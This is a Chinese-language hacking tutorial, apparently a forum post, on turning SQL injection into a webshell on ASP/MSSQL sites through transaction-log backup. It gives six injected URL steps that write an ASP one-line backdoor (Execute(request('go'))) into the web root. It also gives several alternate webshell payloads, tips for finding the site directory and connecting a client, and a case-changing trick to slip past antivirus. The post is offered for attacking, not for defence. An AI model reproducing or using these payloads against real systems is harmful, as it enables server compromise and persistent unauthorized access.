當SQL注入是得到DB權限時候，接下來可以做的工作很多，象找管理員密碼，后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大，所以是我作為對DB權限的第一種試探方法.

但是在LOG備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題，我在這里做個總結，也
好讓我們對不能閉合的方法有一個全面的了解.

1.先介紹下LOG備份，這個相信大家都很熟悉了，我還是習慣在IE里直接提交，返回正常的頁面就說這一步的操作就成功了，如果沒有返回正常的頁面，我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%Execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--

分為6步操作,最容易出錯的就是第4步的操作，經常返回沒有閉合的問題，下面就是一些我們可以將
values中的內容可以進行更換的方式,當我們的一種方式不行的話，就可以換另一種方式，當所有的方式
都換完了，沒有什么好說的，要么就放棄，要么就換另一種方式繼續(xù)，想列目錄找數(shù)據庫下載，后臺.這
里就不多說了，可以提換的內容有:
a).<%%Execute(request("go"))%%>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%Execute(request("l"))%>
<%execute request("a")%>

2.LOG備份要注意的一些問題:
a).要注意你現(xiàn)在的機器是不是WEB主機,簡單的方法就是翻他的目錄，看有沒有IIS安裝的文件
b).當你確定你要找的確實是WEN主機時，就可以找他的站點目錄了,這個也很重要，是步驟5的操作，如果備份到一個錯誤的目錄，當然就沒有辦法訪問了
c).備份成功后，你就可以試著用客戶端去連接，這個地方也有人弄錯，現(xiàn)在用的字段是go,你的客戶端的
相關字段也為go
d).用ececute正常備份出來的是用錯誤提示的，當你的顯示500錯誤時，請你將的IE錯誤提示打開，當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
時候表示你已經成功了，連接吧!!
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在WEB主機的對應目錄是),你可以將

上面的VALUES字段中的值做幾個大小寫轉換，一般是沒有問題的..

3.因為這篇文章用了很多前輩的東西，不敢說是原創(chuàng)，只能算做是討論，我會將我所知道的東西在以后的
日子里一一更新上去..謝謝!!
4.感謝各位前輩提出這么一個好方法否則就不會有這篇文章了..

最新評論